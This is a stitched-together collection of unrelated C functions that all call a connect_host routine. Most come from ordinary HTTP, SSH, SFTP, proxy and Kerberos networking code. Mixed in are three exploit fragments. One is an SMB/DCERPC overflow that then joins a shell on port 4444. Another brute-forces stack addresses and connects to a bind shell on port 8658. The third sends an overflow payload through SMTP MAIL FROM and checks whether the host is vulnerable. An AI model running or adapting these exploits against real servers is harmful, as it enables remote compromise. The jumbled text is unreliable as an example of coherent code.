int main(int argc, char **argv) { if(argc < 3) exp_help(); else process_args(argc, argv); printf("[+] Connecting target %s\n", target_host); connect_host(inet_addr(target_host), 139); printf("[+] Setting up SMB Session\n"); session_setup(); printf("[+] Triggering up DCERPC reassembly\n"); build_trigger(); pwn(); printf("[+] Triggering overflow\n"); build_pwnage(); pwn(); disconnect_host(); sleep(1); printf("[+] Attempting to join shell\n"); connect_host(inet_addr(target_host), 4444); join_shell(sock); return 0; }
int Spider_Http_Client_Base::surface_page(std::string host,Http_Request_Package& request, Http_Response_Package& response) { int sock=connect_host(host); if ( sock<=0 ) { LLOG(L_ERROR, "surface_page connect_host error."); return -1; } int ret=send_package(sock,request); if ( ret!=0 ) { LLOG(L_ERROR,"surface_page:send_package error. "); return -1; } ret=recv_package(sock, response); if (ret!=0) { LLOG(L_ERROR,"surface_page:recv_package error. "); return -1; } int status_code=response.get_status_code(); close_socket(sock); return status_code; }
int main(int argc, const char *argv[]) { const char* host = argv[1]; // 目标主机 char send_buff[SEND_BUF_SIZE]; // 发送缓冲区 char recv_buf[RECV_BUFF_SIZE]; // 接收缓冲区 size_t to_send_size = 0; // 要发送数据大小 int client_fd; // 客户端socket struct addrinfo *addr; // 存放getaddrinfo返回数据 if (argc != 2) { printf("Usage:%s [host]\n", argv[0]); return 1; } addr = get_addr(host, "80"); client_fd = create_socket(addr); connect_host(client_fd, addr); freeaddrinfo(addr); to_send_size = get_send_data(send_buff, SEND_BUF_SIZE, host); send_data(client_fd, send_buff, to_send_size); recv_data(client_fd, recv_buf, RECV_BUFF_SIZE); close(client_fd); return 0; }
void* sendFile(void* args){ struct send_params *p; p = (struct send_params *) args; int sock = connect_host(p->host, p->port); printf("\t[T]Started Sending %s \n", p->filename); FILE *file = fopen(p->filename, "rb"); if (!file){ char msg[4]; *((int *)msg) = htonl(FILE_NOT_FOUND); write(sock, msg, 4); pthread_exit(NULL); } fseek(file, 0, SEEK_END); unsigned long fileLen =ftell(file); // Sending File Length char msg[4]; *((int *)msg) = htonl(fileLen); write(sock, msg, 4); // Sending File Name write(sock, p->filename, MAX_FILE_LENGTH); rewind(file); //Allocate memory char *buffer=(char *)malloc(fileLen+1); fread(buffer, fileLen, 1, file); fclose(file); write(sock, buffer, fileLen + 1); close(sock); printf("\t[T] Sent %d %s\n", (int)fileLen, p->filename); free(buffer); pthread_exit(NULL); }
int exploit (char *host, int port, struct targets target) { char *payload; int thesock; long ret; if (opt_flags & OPT_BRUTE) { for (ret = STACK_START; ret > STACK_END; ret-=steps) { fprintf (stdout, "[+] Trying %#x\n", ret); payload = xp_create (target.addr); xp_send (host, port, payload); sleep(timeout); thesock = connect_host (host, 8658); if (thesock == -1) { fprintf (stdout, "[-] Exploit failed!\n"); xp_destroy (payload); } else { fprintf (stdout, "[+] Exploit success!\n"); fprintf (stdout, "[+] Waiting for shell\n"); shell (thesock); break; } } } else { if (opt_flags & OPT_CHECK) { fprintf (stdout, "[+] Checking for vulnability\n"); } else { fprintf (stdout, "[+] Trying %#x\n", target.addr); } payload = xp_create (target.addr); xp_send (host, port, payload); sleep(2); thesock = connect_host (host, 8658); if (thesock == -1) { fprintf (stdout, "[-] Exploit failed!\n"); xp_destroy (payload); return EXIT_FAILURE; } else { fprintf (stdout, "[+] Exploit success!\n"); fprintf (stdout, "[+] Waiting for shell\n"); sleep(1); shell (thesock); } } return 0; }
int main(int argc, char **argv){ struct argument_s arguments; ssh_session session; int i; arguments_init(&arguments); cmdline_parse(argc, argv, &arguments); if (arguments.nhosts==0){ fprintf(stderr,"At least one host (-h) must be specified\n"); return EXIT_FAILURE; } if (arguments.ntests==0){ for(i=0; i < BENCHMARK_NUMBER ; ++i){ benchmarks[i].enabled=1; } arguments.ntests=BENCHMARK_NUMBER; } buffer=malloc(arguments.chunksize > 1024 ? arguments.chunksize : 1024); if(buffer == NULL){ fprintf(stderr,"Allocation of chunk buffer failed\n"); return EXIT_FAILURE; } if (arguments.verbose > 0){ fprintf(stdout, "Will try hosts "); for(i=0;i<arguments.nhosts;++i){ fprintf(stdout,"\"%s\" ", arguments.hosts[i]); } fprintf(stdout,"with benchmarks "); for(i=0;i<BENCHMARK_NUMBER;++i){ if(benchmarks[i].enabled) fprintf(stdout,"\"%s\" ",benchmarks[i].name); } fprintf(stdout,"\n"); } for(i=0; i<arguments.nhosts;++i){ if(arguments.verbose > 0) fprintf(stdout,"Connecting to \"%s\"...\n",arguments.hosts[i]); session=connect_host(arguments.hosts[i], arguments.verbose, arguments.cipher); if(session != NULL && arguments.verbose > 0) fprintf(stdout,"Success\n"); if(session == NULL){ fprintf(stderr,"Errors occurred, stopping\n"); return EXIT_FAILURE; } do_benchmarks(session, &arguments, arguments.hosts[i]); ssh_disconnect(session); ssh_free(session); } return EXIT_SUCCESS; }
int docycle(const char *host, int test){ SSH_SESSION *session=connect_host(host); int ret=SSH_ERROR; if(!session){ printf("connect failed\n"); } else { printf("Connected\n"); ret=sftp_test(session,test); if(ret != SSH_OK){ printf("Error in sftp\n"); } ssh_disconnect(session); } return ret; }
/* Create a new ssl conn structure and connect to a host */ ssl_conn* ssl_connect_host(char* host, int port) { ssl_conn* ssl; if (!(ssl = (ssl_conn*) malloc(sizeof(ssl_conn)))) { printf("Can't allocate memory\n"); exit(1); } /* Initialize some values */ ssl->encrypted = 0; ssl->write_seq = 0; ssl->read_seq = 0; ssl->sock = connect_host(host, port); return ssl; }
int main(int narg, char **opts) { int port = 8080, timeout = 30000, sock, rc = 0; char *host = 0, *st; char http_req[8192], http_response[8192]; memset(http_req, '\0', sizeof http_req); strcat(http_req, "GET / HTTP/1.0\r\n\r\n"); if(narg < 2) { printf( "Err: No hostname\n"); exit(1); } if(narg >= 3) port = atoi(opts[2]); if(narg >= 4) timeout = atoi(opts[3]); host = opts[1]; sock = connect_host(&rc, host, port, timeout, AF_INET); printf( "After: sock=%d rc=%d\n", sock, rc); errno = 0; rc = write(sock, http_req, strlen(http_req)); printf( "dbg:: post-write rc=%d errno=%d '%s'\n", rc, errno, strerror(errno)); sleep(2); for( rc = read(sock, http_response, sizeof http_response); rc > 0; rc = read(sock, http_response, sizeof http_response)) { st = http_response; printf( "Got:\n%s\n", st); sleep(1); } sleep(1); exit(0); }
int connect_proxy(struct proxyinfo *pi) { char *h=strdup(pi->host); char *p, *q; int fd; if (!h) { courier_authdebug_printf("%s", strerror(errno)); return -1; } for (p=h; *p;) { if (*p == ',') { ++p; continue; } for (q=p; *q; q++) if (*q == ',') break; if (*q) *q++=0; fd=connect_host(pi, p); if (fd >= 0) { free(h); return fd; } p=q; } free(h); return -1; }
void submit_post(const char *host, const char *port, const char *method, const char *url, const char *postdata, uint32_t timeout) { int sockfd, n; unsigned int i; char *buf, *encoded=NULL; size_t bufsz; ssize_t recvsz; char chunkedlen[21]; fd_set readfds; struct timeval tv; char *acceptable_methods[] = { "GET", "PUT", "POST", NULL }; for (i=0; acceptable_methods[i] != NULL; i++) if (!strcmp(method, acceptable_methods[i])) break; if (acceptable_methods[i] == NULL) return; bufsz = strlen(method); bufsz += sizeof(" HTTP/1.1") + 2; /* Yes. Three blank spaces. +1 for the \n */ bufsz += strlen(url); bufsz += sizeof("Host: \r\n"); bufsz += strlen(host); bufsz += sizeof("Connection: Close\r\n"); bufsz += 4; /* +4 for \r\n\r\n */ if (!strcmp(method, "POST") || !strcmp(method, "PUT")) { encoded = encode_data(postdata); if (!(encoded)) return; snprintf(chunkedlen, sizeof(chunkedlen), "%zu", strlen(encoded)); bufsz += sizeof("Content-Type: application/x-www-form-urlencoded\r\n"); bufsz += sizeof("Content-Length: \r\n"); bufsz += strlen(chunkedlen); bufsz += strlen(encoded); } buf = cli_calloc(1, bufsz); if (!(buf)) { if ((encoded)) free(encoded); return; } snprintf(buf, bufsz, "%s %s HTTP/1.1\r\n", method, url); snprintf(buf+strlen(buf), bufsz-strlen(buf), "Host: %s\r\n", host); snprintf(buf+strlen(buf), bufsz-strlen(buf), "Connection: Close\r\n"); if (!strcmp(method, "POST") || !strcmp(method, "PUT")) { snprintf(buf+strlen(buf), bufsz-strlen(buf), "Content-Type: application/x-www-form-urlencoded\r\n"); snprintf(buf+strlen(buf), bufsz-strlen(buf), "Content-Length: %s\r\n", chunkedlen); snprintf(buf+strlen(buf), bufsz-strlen(buf), "\r\n"); snprintf(buf+strlen(buf), bufsz-strlen(buf), "%s", encoded); free(encoded); } #if defined(_WIN32) sockfd = connect_host(host, port, timeout, 0); #else sockfd = connect_host(host, port, timeout, 1); #endif if (sockfd < 0) { free(buf); return; } cli_dbgmsg("stats - Connected to %s:%s\n", host, port); if ((size_t)send(sockfd, buf, strlen(buf), 0) != (size_t)strlen(buf)) { closesocket(sockfd); free(buf); return; } cli_dbgmsg("stats - Sending %s\n", buf); while (1) { FD_ZERO(&readfds); FD_SET(sockfd, &readfds); /* * Check to make sure the stats submitted okay (so that we don't kill the HTTP request * while it's being processed). Give a ten-second timeout so we don't have a major * impact on scanning. */ tv.tv_sec = timeout; tv.tv_usec = 0; if ((n = select(sockfd+1, &readfds, NULL, NULL, &tv)) <= 0) break; if (FD_ISSET(sockfd, &readfds)) { memset(buf, 0x00, bufsz); if ((recvsz = recv(sockfd, buf, bufsz-1, 0) <= 0)) break; buf[bufsz-1] = '\0'; cli_dbgmsg("stats - received: %s\n", buf); if (strstr(buf, "STATOK")) { cli_dbgmsg("stats - Data received okay\n"); break; } } } closesocket(sockfd); free(buf); }
/* * ------------------------------------------------------------ */ int main(int argc, char **argv) { /* In general, suffix "l" is low channel, "h" is high channel, "g" * is gdb channel, "c" is control channel and "o" is output channel. */ struct sockaddr_in from; int infd = 0, outfd; unsigned short portl, porth, portg, portc, porto; int on = 1, c; char *outname, *outservice; int fromlen; int lish, lisg, lisc; #if 0 FILE *newerr; #endif /* 0 */ prog_name = argv[0]; if (isatty(infd)) usage(); /* Here, then not just a simple idiot. */ signal(SIGPIPE, SIG_IGN); openlog(prog_name, LOG_PID, LOG_DAEMON); fromlen = sizeof(from); if (getsockname(infd, &from, &fromlen) < 0) fault("getsockname: %s", strerror(errno)); if ((fromlen != sizeof(from)) || (from.sin_family != AF_INET)) fault("not an inet socket (family=%d)\n", from.sin_family); portl = ntohs(from.sin_port); porth = portl+1; portg = porth+1; portc = portg+1; fromlen = sizeof(from); if (getpeername(infd, &from, &fromlen) < 0) fault("getpeername: %s", strerror(errno)); if ((fromlen != sizeof(from)) || (from.sin_family != AF_INET)) fault("not an inet socket (family=%d)\n", from.sin_family); syslog(LOG_INFO, "on port %u peer is %s:%u\n", portl, inet_ntoa(from.sin_addr), ntohs(from.sin_port)); if (setsockopt(infd, SOL_SOCKET, SO_KEEPALIVE, &on, sizeof (on)) < 0) syslog(LOG_WARNING, "setsockopt (SO_KEEPALIVE): %m"); /* from here on, we map stderr to output on the connection so we can * report errors to the remote user. */ #if 0 if (!(newerr = fdopen(infd, "w"))) syslog(LOG_WARNING, "fdopen: %m"); else *stderr = *newerr; #endif while((c = getopt(argc, argv, "d8h:g:c:")) != EOF) { switch(c) { case 'd': debug++; break; case 'h': /* high bit port */ if (getservice(optarg, &porth) < 0) fault("getservice failed (high port '%s')\n", optarg); break; case 'g': /* gdb port */ if (getservice(optarg, &portg) < 0) fault("getservice failed (gdb port '%s')\n", optarg); break; case 'c': /* control port */ if (getservice(optarg, &portc) < 0) fault("getservice failed (control port '%s')\n", optarg); break; case '8': /* 8-bit clean; no high port */ porth=0; break; default: fault("bad argument list!\n"); } } if (argc != optind + 1) fault("unparsed arguments (%d!=%d)\n", argc, optind+1); outname = argv[optind]; if (!(outservice = strchr(outname, ':'))) fault("output arg '%s' doesn't contain ':'\n", outname); *outservice++ = 0; if (getservice(outservice, &porto) < 0) fault("getservice failed (output port '%s')\n", outservice); /* Time to start the sockets */ if (porth) { lish = startlistening(porth); } else { lish = -1; } lisg = startlistening(portg); lisc = startlistening(portc); outfd = connect_host(outname, porto); doit(infd, outfd, lish, lisg, lisc); syslog(LOG_INFO, "terminating normally\n"); fclose(stderr); closelog(); exit(0); }
void GET(int newsockfd) { char s[INET6_ADDRSTRLEN]; char buffer[1024]; int flag=0,n,i; char t1[512],t2[512],t3[16]; char* temp=NULL; char* port; bzero(buffer,1024); recv(newsockfd,buffer,1024,0); sscanf(buffer,"%s %s %s",t1,t2,t3); if(((strncmp(t1,"GET",3)==0))&&((strncmp(t3,"HTTP/1.1",8)==0)||(strncmp(t3,"HTTP/1.0",8)==0))&&(strncmp(t2,"http://",7)==0)) { strcpy(t1,t2); flag=0; for(i=7;i<strlen(t2);i++) { if(t2[i]==':') { flag=1; break; } } temp=strtok(t2,"//"); if(flag==0) { port="80"; temp=strtok(NULL,"/"); } else { temp=strtok(NULL,":"); } sprintf(t2,"%s",temp); printf("host = %s",t2); if(flag==1) { temp=strtok(NULL,"/"); port=temp; } strcat(t1,"^]"); temp=strtok(t1,"//"); temp=strtok(NULL,"/"); if(temp!=NULL) temp=strtok(NULL,"^]"); printf("\npath = %s\nPort = %s\n",temp,port); i=dir(t2,temp); if(i==1) { printf("From Host\n"); connect_host(t2,port,temp,t3,newsockfd); } else { printf("From cache\n"); send_file(t2,port,temp,t3,newsockfd); } } else { send(newsockfd,"400 : BAD REQUEST\nONLY HTTP REQUESTS ALLOWED",44,0); } }
static int doit_active (kx_context *kc) { int otherside; int nsockets; struct x_socket *sockets; u_char msg[1024], *p; int len; int tmp, tmp2; char *str; int i; size_t rem; uint32_t other_port; int error; const char *host = kc->host; otherside = connect_host (kc); if (otherside < 0) return 1; #if defined(SO_KEEPALIVE) && defined(HAVE_SETSOCKOPT) if (kc->keepalive_flag) { int one = 1; setsockopt (otherside, SOL_SOCKET, SO_KEEPALIVE, (void *)&one, sizeof(one)); } #endif p = msg; rem = sizeof(msg); *p++ = INIT; --rem; len = strlen(kc->user); tmp = kx_put_int (len, p, rem, 4); if (tmp < 0) return 1; p += tmp; rem -= tmp; memcpy(p, kc->user, len); p += len; rem -= len; *p++ = (kc->keepalive_flag ? KEEP_ALIVE : 0); --rem; str = getenv("DISPLAY"); if (str == NULL || (str = strchr(str, ':')) == NULL) str = ":0"; len = strlen (str); tmp = kx_put_int (len, p, rem, 4); if (tmp < 0) return 1; rem -= tmp; p += tmp; memcpy (p, str, len); p += len; rem -= len; str = getenv("XAUTHORITY"); if (str == NULL) str = ""; len = strlen (str); tmp = kx_put_int (len, p, rem, 4); if (tmp < 0) return 1; p += len; rem -= len; memcpy (p, str, len); p += len; rem -= len; if (kx_write (kc, otherside, msg, p - msg) != p - msg) err (1, "write to %s", host); len = kx_read (kc, otherside, msg, sizeof(msg)); if (len < 0) err (1, "read from %s", host); p = (u_char *)msg; if (*p == ERROR) { uint32_t u32; p++; p += kx_get_int (p, &u32, 4, 0); errx (1, "%s: %.*s", host, (int)u32, p); } else if (*p != ACK) { errx (1, "%s: strange msg %d", host, *p); } tmp2 = get_xsockets (&nsockets, &sockets, kc->tcp_flag); if (tmp2 < 0) errx(1, "Failed to open sockets"); display_num = tmp2; if (kc->tcp_flag) snprintf (display, display_size, "localhost:%u", display_num); else snprintf (display, display_size, ":%u", display_num); error = create_and_write_cookie (xauthfile, xauthfile_size, cookie, cookie_len); if (error) errx(1, "failed creating cookie file: %s", strerror(error)); status_output (kc->debug_flag); for (;;) { fd_set fdset; pid_t child; int fd, thisfd = -1; socklen_t zero = 0; FD_ZERO(&fdset); for (i = 0; i < nsockets; ++i) { if (sockets[i].fd >= FD_SETSIZE) errx (1, "fd too large"); FD_SET(sockets[i].fd, &fdset); } if (select(FD_SETSIZE, &fdset, NULL, NULL, NULL) <= 0) continue; for (i = 0; i < nsockets; ++i) if (FD_ISSET(sockets[i].fd, &fdset)) { thisfd = sockets[i].fd; break; } fd = accept (thisfd, NULL, &zero); if (fd < 0) { if (errno == EINTR) continue; else err(1, "accept"); } p = msg; *p++ = NEW_CONN; if (kx_write (kc, otherside, msg, p - msg) != p - msg) err (1, "write to %s", host); len = kx_read (kc, otherside, msg, sizeof(msg)); if (len < 0) err (1, "read from %s", host); p = (u_char *)msg; if (*p == ERROR) { uint32_t val; p++; p += kx_get_int (p, &val, 4, 0); errx (1, "%s: %.*s", host, (int)val, p); } else if (*p != NEW_CONN) { errx (1, "%s: strange msg %d", host, *p); } else { p++; p += kx_get_int (p, &other_port, 4, 0); } ++nchild; child = fork (); if (child < 0) { warn("fork"); continue; } else if (child == 0) { int s; for (i = 0; i < nsockets; ++i) close (sockets[i].fd); close (otherside); socket_set_port(kc->thataddr, htons(tmp)); s = socket (kc->thataddr->sa_family, SOCK_STREAM, 0); if (s < 0) err(1, "socket"); #if defined(TCP_NODELAY) && defined(HAVE_SETSOCKOPT) { int one = 1; setsockopt (s, IPPROTO_TCP, TCP_NODELAY, (void *)&one, sizeof(one)); } #endif #if defined(SO_KEEPALIVE) && defined(HAVE_SETSOCKOPT) if (kc->keepalive_flag) { int one = 1; setsockopt (s, SOL_SOCKET, SO_KEEPALIVE, (void *)&one, sizeof(one)); } #endif if (connect (s, kc->thataddr, kc->thataddr_len) < 0) err(1, "connect"); return active_session (fd, s, kc); } else { close (fd); } } }
static int doit_passive (kx_context *kc) { int otherside; u_char msg[1024], *p; int len; uint32_t tmp; const char *host = kc->host; otherside = connect_host (kc); if (otherside < 0) return 1; #if defined(SO_KEEPALIVE) && defined(HAVE_SETSOCKOPT) if (kc->keepalive_flag) { int one = 1; setsockopt (otherside, SOL_SOCKET, SO_KEEPALIVE, (void *)&one, sizeof(one)); } #endif p = msg; *p++ = INIT; len = strlen(kc->user); p += kx_put_int (len, p, sizeof(msg) - 1, 4); memcpy(p, kc->user, len); p += len; *p++ = PASSIVE | (kc->keepalive_flag ? KEEP_ALIVE : 0); if (kx_write (kc, otherside, msg, p - msg) != p - msg) err (1, "write to %s", host); len = kx_read (kc, otherside, msg, sizeof(msg)); if (len <= 0) errx (1, "error reading initial message from %s: " "this probably means it's using an old version.", host); p = (u_char *)msg; if (*p == ERROR) { p++; p += kx_get_int (p, &tmp, 4, 0); errx (1, "%s: %.*s", host, (int)tmp, p); } else if (*p != ACK) { errx (1, "%s: strange msg %d", host, *p); } else p++; p += kx_get_int (p, &tmp, 4, 0); memcpy(display, p, tmp); display[tmp] = '\0'; p += tmp; p += kx_get_int (p, &tmp, 4, 0); memcpy(xauthfile, p, tmp); xauthfile[tmp] = '\0'; p += tmp; status_output (kc->debug_flag); for (;;) { pid_t child; len = kx_read (kc, otherside, msg, sizeof(msg)); if (len < 0) err (1, "read from %s", host); else if (len == 0) return 0; p = (u_char *)msg; if (*p == ERROR) { p++; p += kx_get_int (p, &tmp, 4, 0); errx (1, "%s: %.*s", host, (int)tmp, p); } else if(*p != NEW_CONN) { errx (1, "%s: strange msg %d", host, *p); } else { p++; p += kx_get_int (p, &tmp, 4, 0); } ++nchild; child = fork (); if (child < 0) { warn("fork"); continue; } else if (child == 0) { int fd; int xserver; close (otherside); socket_set_port(kc->thataddr, htons(tmp)); fd = socket (kc->thataddr->sa_family, SOCK_STREAM, 0); if (fd < 0) err(1, "socket"); #if defined(TCP_NODELAY) && defined(HAVE_SETSOCKOPT) { int one = 1; setsockopt (fd, IPPROTO_TCP, TCP_NODELAY, (void *)&one, sizeof(one)); } #endif #if defined(SO_KEEPALIVE) && defined(HAVE_SETSOCKOPT) if (kc->keepalive_flag) { int one = 1; setsockopt (fd, SOL_SOCKET, SO_KEEPALIVE, (void *)&one, sizeof(one)); } #endif if (connect (fd, kc->thataddr, kc->thataddr_len) < 0) err(1, "connect(%s)", host); { int d = 0; char *s; s = getenv ("DISPLAY"); if (s != NULL) { s = strchr (s, ':'); if (s != NULL) d = atoi (s + 1); } xserver = connect_local_xsocket (d); if (xserver < 0) return 1; } return passive_session (xserver, fd, kc); } else { } } }
static int prepare_http(int fd, char *buf) { int host_fd, hdr_size, len_diff; unsigned size, path_len, host_len, move_len; char *h, *p, *host = NULL, *referer = NULL, *referer_end, *path; if ((size = read_http_header(fd, buf)) == -1U) return ERR_READ_REQ; hdr_size = size >> 16; size &= 0xffff; if (invalid(buf, buf, hdr_size + 4)) return ERR_BAD_REQ; // buf has enough space after size even when "\r\n\r\n" was not found, // because MAX_HEADERS_SIZE - BUF_SIZE > 2 buf[hdr_size + 2] = 0; // "\r\n\r\n" -> "\r\n\0\n" if (!(path = strpbrk(buf, " \r\n"))) return ERR_BAD_REQ; path_len = strcspn(++path, " \r\n"); p = strstr(path + path_len, "\r\n"); while (p && (!host || !referer) && (p = strstr(h = p + 2, "\r\n"))) if (!strncasecmp(h, "host:", 5)) { host = h + 5; host += strspn(host, " \t"); host_len = p - host; } else if (!strncasecmp(h, "referer:", 8)) { referer = h + 8; referer += strspn(referer, " \t"); referer += strcspn(referer, "/\r\n"); referer += strspn(referer, "/"); referer_end = p; } if (invalid(buf, host, host_len + 1)) return ERR_NO_HOST; host[host_len] = 0; if (referer && no_referer_match(host, referer)) { if (path_len > 3 && !memcmp(path + path_len - 3, ".js", 3)) { syslog(LOG_DEBUG | LOG_DAEMON, "refused: %s", host); return ERR_REFUSED; // javascript cross-reference } if (memmem(path, path_len, ".gif?", 5)) { syslog(LOG_DEBUG | LOG_DAEMON, "refused gif: %s", host); return ERR_EMPTY_GIF; } } else { referer = NULL; // matches, don't remove } host_fd = connect_host(host); if (host_fd < 0) return host_fd; host[host_len] = '\r'; buf[hdr_size + 2] = '\r'; len_diff = BUF_SIZE; if (referer) len_diff = host_len + 1 - (referer_end - referer); if (len_diff < BUF_SIZE - MAX_HEADERS_SIZE) { p = host_len + 1 + referer; move_len = buf + size - referer_end; if (invalid(buf, p, move_len) || invalid(buf, referer_end, move_len) || invalid(buf, referer, host_len)) return ERR_BAD_REQ; memmove(p, referer_end, move_len); size += len_diff; if (host > referer) host += len_diff; memcpy(referer, host, host_len); referer[host_len] = '/'; } if (full_write(host_fd, buf, size) <= 0) { close(host_fd); return ERR_WRITE; } return host_fd; }
int xp_send (char *host, int port, char *payload) { int thesock; char buffer[BUFSIZ]; struct timeval tv; fd_set rfds, wfds; int ret; thesock = connect_host (host, port); if (thesock == -1) { fprintf (stderr, "[-] Can't connect to target %s\n", host); exit (EXIT_FAILURE); } else { fprintf (stdout, "[+] Connected.\n"); } memset (buffer, 0x00, BUFSIZ); #ifdef DEBUG sleep(4); #endif // reading banner //fprintf (stderr, "reading banner...\n"); memset (buffer, 0x00, BUFSIZ); ret = recv (thesock, buffer, sizeof (buffer), 0); //fprintf (stdout, "%s\n", buffer); //sending helo //fprintf (stderr, "sending HELO...\n"); memset (buffer, 0x00, BUFSIZ); ret = send (thesock, HELO, strlen(HELO), 0); ret = recv (thesock, buffer, sizeof (buffer), 0); //fprintf (stdout, "%s\n", buffer); // sending mail from: //fprintf (stderr, "sending MAIL FROM:...\n"); memset (buffer, 0x00, BUFSIZ); ret = send (thesock, FROM, strlen (FROM), 0); ret = send (thesock, payload, strlen (payload), 0); ret = recv (thesock, buffer, sizeof (buffer), 0); //fprintf (stdout, "%s\n", buffer); // sending rcpt to: //fprintf (stderr, "sending RCPT TO:...\n"); memset (buffer, 0x00, BUFSIZ); ret = send (thesock, RCPT, strlen (RCPT), 0); ret = recv (thesock, buffer, sizeof (buffer), 0); //fprintf (stdout, "%s\n", buffer); FD_ZERO(&rfds); FD_SET(thesock, &rfds); tv.tv_sec = 7; tv.tv_usec = 0; // data //fprintf (stderr, "sending DATA:...\n"); memset (buffer, 0x00, BUFSIZ); ret = send (thesock, DATA, strlen (DATA), 0); select (thesock+1, &rfds, NULL, NULL, &tv); if (FD_ISSET(thesock, &rfds)) { ret = recv (thesock, buffer, sizeof (buffer), 0); //fprintf (stdout, "%s\n", buffer); } else { close (thesock); return -1; } FD_ZERO(&rfds); FD_SET(thesock, &rfds); tv.tv_sec = 7; tv.tv_usec = 0; // end things //fprintf (stderr, "sending END THINGS:...\n"); memset (buffer, 0x00, BUFSIZ); ret = send (thesock, END, strlen (END), 0); select (thesock+1, &rfds, NULL, NULL, &tv); if (!FD_ISSET(thesock, &rfds)) { fprintf (stdout, "[+] Offset seems good ! if the next hit fails\n"); fprintf (stdout, "[+] try to decrement THIS adddress by 5 or 10!\n"); close (thesock); return -1; } ret = recv (thesock, buffer, sizeof (buffer), 0); if (opt_flags & OPT_CHECK) { if (buffer[0] == 0x00) { fprintf (stdout, "[+] Host seams vulnable!\n"); } else { fprintf (stdout, "[-] Host is not vulnable!\n"); } close (thesock); exit (EXIT_SUCCESS); } //fprintf (stdout, "%s\n", buffer); ret = send (thesock, QUIT, strlen (QUIT), 0); close (thesock); return ret; }